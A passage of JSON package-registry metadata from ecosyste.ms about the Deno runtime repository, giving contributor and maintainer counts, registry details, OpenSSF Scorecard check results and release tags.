vy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FDenoland%2Fdeno/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FDenoland%2Fdeno/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FDenoland%2Fdeno/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FDenoland%2Fdeno/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FDenoland%2Fdeno/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FDenoland%2Fdeno/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2282188,"maintainers_count":0,"namespaces_count":839573,"keywords_count":126245,"github":"golang","metadata":{"funded_packages_count":69842,"sync_missing_packages_cursor":{"timestamp":"2026-08-17T00:00:58.969562Z","path":"github.com/Tektoncd/operator","version":"v0.78.0"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-09-01T05:03:01.892Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":4047788,"name":"deno_webidl","ecosystem":"cargo","description":"WebIDL implementation for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":260,"first_release_published_at":"2021-03-12T20:55:43.676Z","latest_release_published_at":"2026-08-27T15:20:09.394Z","latest_release_number":"0.258.0","last_synced_at":"2026-08-29T21:57:05.114Z","created_at":"2022-04-12T10:02:32.524Z","updated_at":"2026-08-29T21:57:05.114Z","registry_url":"https://crates.io/crates/deno_webidl/","install_command":"cargo install deno_webidl","documentation_url":"https://docs.rs/deno_webidl/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/d